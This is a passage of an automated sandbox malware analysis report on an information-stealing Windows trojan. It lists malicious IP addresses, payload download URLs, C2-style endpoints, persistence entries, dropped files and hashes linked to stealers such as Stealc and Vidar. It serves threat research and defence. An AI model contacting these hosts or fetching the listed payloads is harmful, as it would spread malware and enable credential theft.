0000000E.00000002.3002800911.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0D	kO1P1YnLst.exe, 00000000.00000003.1830645130.00000000074BA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitor	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe	u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp	false		high
http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp	false		high
https://rt.services.visualstudio.com/	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe	u5c4.0.exe, 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmp	false		high
https://westus2-2.in.applicationinsights.azure.com0p5	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.2971669712.0000024080247000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.172.128.203/tiktok.exek	u5c4.0.exe, 00000001.00000002.2516601507.000000002A6B1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.172.128.76/3cd2b41cbde8fc9c.phpW	u5c4.0.exe, 00000001.00000002.2500095496.000000000436A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sqlite.org/copyright.html.	u5c4.0.exe, 00000001.00000002.2519749464.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, u5c4.0.exe, 00000001.00000002.2511422871.000000001E636000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/JamesNK/Newtonsoft.Json	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042888940.00000240F7CA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp	false		high
http://91.215.85.66:9000	MSBuild.exe, 0000000E.00000002.2977711882.0000000002D23000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.2977711882.0000000002C71000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.172.128.90	unknown	Russian Federation	50916	NADYMSS-ASRU	true
185.172.128.228	unknown	Russian Federation	50916	NADYMSS-ASRU	false
185.172.128.203	unknown	Russian Federation	50916	NADYMSS-ASRU	false
20.157.87.45	svc.iolo.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
91.215.85.66	unknown	Russian Federation	34665	PINDC-ASRU	true
185.172.128.76	unknown	Russian Federation	50916	NADYMSS-ASRU	true
176.97.76.106	note.padd.cn.com	United Kingdom	43658	INTRAFFIC-ASUA	false
185.172.128.59	unknown	Russian Federation	50916	NADYMSS-ASRU	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1432397
Start date and time:	2024-04-27 00:45:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	kO1P1YnLst.exe renamed because original name is a hash value
Original Sample Name:	18d635dbc4392c2470eb97d1063e8484.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@27/64@4/8
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 85% Number of executed functions: 108 Number of non-executed functions: 238
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.190.152.21, 40.126.24.83, 40.126.24.82, 40.126.24.147, 40.126.24.148, 40.126.24.149, 20.190.152.22, 20.190.152.19, 52.165.165.26, 199.232.214.172, 192.229.211.108, 13.85.23.206, 52.182.143.212, 20.242.39.171, 23.51.58.94, 20.9.155.148, 52.168.117.173
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, gig-ai-prod-westus2-0.trafficmanager.net, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, gig-ai-prod-wus2-01-app-v4-tag.westus2.cloudapp.azure.com, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: kO1P1YnLst.exe

Simulations

Behavior and APIs

Time	Type	Description
00:46:27	API Interceptor	2x Sleep call for process: WerFault.exe modified
00:46:43	API Interceptor	176744x Sleep call for process: MSBuild.exe modified
00:46:51	API Interceptor	1x Sleep call for process: cmd.exe modified
00:47:01	API Interceptor	18747x Sleep call for process: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe modified
00:47:53	API Interceptor	17x Sleep call for process: IIDHJDGCGD.exe modified
23:46:27	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\il_Plugin_v1.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.172.128.90	wxfSIz4PAi.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=two&s=ab&sub=0
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=2838
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=0
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=28381000
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=0
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
185.172.128.228	wxfSIz4PAi.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.228/ping.php?substr=seven
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
note.padd.cn.com	wxfSIz4PAi.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	176.97.76.106
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
iolo0.b-cdn.net	wxfSIz4PAi.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	195.181.163.193
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	156.146.43.65
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	195.181.163.196
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	195.181.163.196
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	195.181.163.195
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	169.150.236.98
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	169.150.236.97
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.251
	YY8EqpwVDY.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.247
	kOX6mvvEZv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.246
bg.microsoft.map.fastly.net	https://loowes.shop/	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse	199.232.214.172
	https://frimac2.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	199.232.214.172
	https://3rdkxalxjperror10427.z31.web.core.windows.net/ErW0ind0SmW0Security04/index.html	Get hash	malicious	TechSupportScam	Browse	199.232.210.172
	http://carajasnutricaoanimal.com	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://messageis.ru/pre/profile/message	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
	https://herofargwsmnncmwsrcnmwsncmwscnm.popsy.site/	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
	https://doc-42.jimdosite.com/	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
	https://xxxjns2qi.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	199.232.210.172
	https://mss.ehs2.com/?dilywvqc	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://www.flowcode.com/page/theferrucciolawfirm	Get hash	malicious	Unknown	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NADYMSS-ASRU	wxfSIz4PAi.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	3R18jv6iGv.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	YEnIrzZUUw.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	bUcIhJ4VHm.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	w3WOJ1ohgD.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	http://185.172.128.63/v8sjh3hs8/index.php	Get hash	malicious	Unknown	Browse	185.172.128.63
NADYMSS-ASRU	wxfSIz4PAi.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	3R18jv6iGv.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	YEnIrzZUUw.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	bUcIhJ4VHm.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	w3WOJ1ohgD.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	http://185.172.128.63/v8sjh3hs8/index.php	Get hash	malicious	Unknown	Browse	185.172.128.63
MICROSOFT-CORP-MSN-AS-BLOCKUS	https://document.mamabiller59.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.38
	https://sgusa3.sharepoint.com/:f:/s/ESSExternalPortal/Ep2vdkaY-f5IstEbB83tCgcBs_cKepSlCQGqJ92Z-gw5uQ?xsdata=MDV8MDJ8bW1leWVyc0BidXJuc21jZC5jb218OWZhZmYwM2M2MThiNGMzMmI4NjYwOGRjNjYyZjk3YWR8YmZiYjlhMmI2ZDk5NGU3OGIzYzc5NTAwNWQ1NTVjOGJ8MHwwfDYzODQ5NzYwMTc5ODA4MjQwNHxVbmtub3dufFRXRnBiR1pzYjNkOGV5SldJam9pTUM0d0xqQXdNREFpTENKUUlqb2lWMmx1TXpJaUxDSkJUaUk2SWsxaGFXd2lMQ0pYVkNJNk1uMD18MHx8fA%3d%3d&sdata=bngyZ1FROWtWMzlEWlhCYjlhRkpvV0dHeHJKK2JGZG9MckVVMGFjcHpYYz0%3d	Get hash	malicious	HTMLPhisher	Browse	13.107.136.10
	https://qdorbb80j410g85n.azureedge.net/010au/	Get hash	malicious	TechSupportScam	Browse	13.107.213.70
	https://worker-curly-silence-18d1.pistisarte.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	13.107.213.40
	wxfSIz4PAi.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	phish_alert_sp2_2.0.0.0 - 2024-04-26T151509.287.eml	Get hash	malicious	HTMLPhisher	Browse	52.168.117.168
	https://herofargwsmnncmwsrcnmwsncmwscnm.popsy.site/	Get hash	malicious	HTMLPhisher	Browse	52.96.104.50
	https://gjyefv.degaris.com/	Get hash	malicious	HTMLPhisher	Browse	13.107.213.41
	https://www.flowcode.com/page/theferrucciolawfirm	Get hash	malicious	Unknown	Browse	13.107.213.41
	Settlement DOL 08262024 - Victoria Brignon - Reference #27224675-2722934.html	Get hash	malicious	HTMLPhisher	Browse	13.107.213.41
NADYMSS-ASRU	wxfSIz4PAi.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	3R18jv6iGv.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	YEnIrzZUUw.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	bUcIhJ4VHm.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	w3WOJ1ohgD.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
	http://185.172.128.63/v8sjh3hs8/index.php	Get hash	malicious	Unknown	Browse	185.172.128.63

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://loowes.shop/	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse	169.150.236.100
	https://document.mamabiller59.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	169.150.236.100
	https://qdorbb80j410g85n.azureedge.net/010au/	Get hash	malicious	TechSupportScam	Browse	169.150.236.100
	https://wvijwiyjap-xn----90at1dc-xn----p1ai.translate.goog/hdiw/zqteil/efdfdqgb?ZEdOcFFIUmtZMm91ZEdWNFlYTXVaMjkyOml5YXBpdndiY20=+&_x_tr_sch=http&_x_tr_sl=dosderma&_x_tr_tl=bempjhrl	Get hash	malicious	Unknown	Browse	169.150.236.100
	https://worker-curly-silence-18d1.pistisarte.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	169.150.236.100
	https://1st2844kxjperro04264.z31.web.core.windows.net/ErW0ind0SmW0Security04/index.html	Get hash	malicious	TechSupportScam	Browse	169.150.236.100
	https://3rdkxalxjperror10427.z31.web.core.windows.net/ErW0ind0SmW0Security04/index.html	Get hash	malicious	TechSupportScam	Browse	169.150.236.100
	https://palmettoanimalclinic.aweb.page/p/0ac693e3-6f85-4fd6-86d7-f770e6e73d32	Get hash	malicious	Unknown	Browse	169.150.236.100
	Lab5-3.exe	Get hash	malicious	Chaos, Conti, LockBit ransomware, TrojanRansom	Browse	169.150.236.100
	http://www.superiorbillingsolutions.com	Get hash	malicious	Unknown	Browse	169.150.236.100

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	wxfSIz4PAi.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
	3R18jv6iGv.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	YEnIrzZUUw.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	bUcIhJ4VHm.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	wxfSIz4PAi.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse
	3R18jv6iGv.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	YEnIrzZUUw.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	bUcIhJ4VHm.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\CBAKEBGIIDAFIDHIIECFCFIEGH

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DVWHKMNFNN.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\ProgramData\DVWHKMNFNN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
